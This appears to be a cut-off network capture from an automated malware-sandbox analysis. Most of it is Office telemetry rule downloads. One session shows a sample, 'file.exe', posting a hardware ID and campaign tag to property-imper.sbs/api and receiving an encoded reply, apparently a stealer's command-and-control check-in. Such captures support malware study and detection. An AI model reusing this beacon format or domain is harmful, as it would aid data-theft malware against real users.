                                                                                                                                                                                              2024-11-24 12:39:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:22 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                              x-ms-request-id: f1d8b84e-f01e-0096-7de6-3d10ef000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123922Z-178bfbc474bwlrhlhC1NYCy3kg00000005z0000000006zdd
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:22 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              30192.168.2.64973813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:21 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:21 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 464
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                              ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                              x-ms-request-id: 918e3103-701e-0097-4a7c-3bb8c1000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123921Z-174c587ffdfp4vpjhC1TEBybqw00000004dg00000000av1n
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:22 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              31192.168.2.64974113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:23 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:23 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9748630E"
                                                                                                                                                                                              x-ms-request-id: a56dfe0e-901e-0029-2976-3b274a000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123923Z-174c587ffdfcj798hC1TEB9bq400000004m000000000a92y
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              32192.168.2.64974213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:23 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:24 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                              x-ms-request-id: 798eb064-701e-0021-422e-3c3d45000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123924Z-178bfbc474bpscmfhC1NYCfc2c00000004k0000000006num
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              33192.168.2.64974313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:23 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:24 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                              x-ms-request-id: cbc435e9-501e-0016-3f64-3d181b000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123924Z-15b8b599d88vp97chC1TEB5pzw00000004gg000000001q03
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:24 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              34192.168.2.64974413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:23 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:24 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 428
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                              ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                              x-ms-request-id: c49e358a-d01e-008e-6463-3b387a000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123924Z-178bfbc474bw8bwphC1NYC38b400000005t000000000832c
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:24 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              35192.168.2.64974513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:23 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:24 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                              x-ms-request-id: 6ea5360a-801e-002a-4904-3e31dc000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123924Z-178bfbc474bv7whqhC1NYC1fg4000000062g000000000uhk
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:24 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              36192.168.2.649746104.21.33.1164435044C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:24 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 88
                                                                                                                                                                                              Host: property-imper.sbs
                                                                                                                                                                                              2024-11-24 12:39:24 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 30 44 46 41 41 38 34 45 46 37 30 36 45 31 35 45 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=0DFAA84EF706E15ED7CBBD6DF28D3732
                                                                                                                                                                                              2024-11-24 12:39:25 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:25 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=7ob4si0oc0akq9s6u3r5lvdi29; expires=Thu, 20-Mar-2025 06:26:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1SpNOAWO3dSFAigoiOo8N4QgZ1%2FCnS7sWd5V4A9Ak8uJfrAcS9vem66CHpN3wFvL3VPefKQAJ8wY2hIINNCcSLr%2B%2BPEZJpwB%2FpOw7Aw6fkfzIdglkm0WovT0ktSiTuQxL%2BsgCUE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e79762bfb634295-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=990&delivery_rate=1811414&cwnd=252&unsent_bytes=0&cid=4827a815a9136fa0&ts=755&x=0"
                                                                                                                                                                                              2024-11-24 12:39:25 UTC214INData Raw: 64 30 0d 0a 45 6a 39 35 31 62 6f 34 6e 4b 71 71 4c 75 6b 63 32 70 44 39 36 56 2f 54 7a 52 53 6c 6e 73 46 6b 72 64 44 55 41 33 71 75 56 48 46 4a 52 46 75 67 6d 41 4b 2b 77 74 35 61 6d 53 61 47 76 36 48 47 62 75 76 34 4f 70 65 76 39 45 71 63 34 65 63 74 53 35 67 49 58 6e 31 5a 48 34 6d 56 58 50 6e 4d 68 45 75 52 65 66 69 38 33 34 38 72 38 66 63 6b 69 62 79 6b 52 70 66 68 71 53 38 42 6a 43 46 54 4b 42 30 52 6f 63 35 49 70 76 61 46 63 73 59 74 34 71 58 54 32 32 37 6d 34 79 57 55 72 65 39 56 6d 34 7a 37 63 41 37 4c 4e 52 78 4f 45 41 75 30 31 46 7a 7a 78 34 52 4c 6b 58 6e 34 76 4e 2b 50 4b 2f 48 33 4a 49 6d 38 70 45 61 58 34 4b 6c 65 0d 0a
                                                                                                                                                                                              Data Ascii: d0Ej951bo4nKqqLukc2pD96V/TzRSlnsFkrdDUA3quVHFJRFugmAK+wt5amSaGv6HGbuv4Opev9Eqc4ectS5gIXn1ZH4mVXPnMhEuRefi8348r8fckibykRpfhqS8BjCFTKB0Roc5IpvaFcsYt4qXT227m4yWUre9Vm4z7cA7LNRxOEAu01Fzzx4RLkXn4vN+PK/H3JIm8pEaX4Kle
                                                                                                                                                                                              2024-11-24 12:39:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              37192.168.2.64974713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:25 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:26 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 499
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                              ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                              x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123926Z-174c587ffdf8lw6dhC1TEBkgs800000004gg0000000032wn
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:26 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              38192.168.2.64974913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:25 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:26 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                              x-ms-request-id: 9053a11e-c01e-0046-640f-3d2db9000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
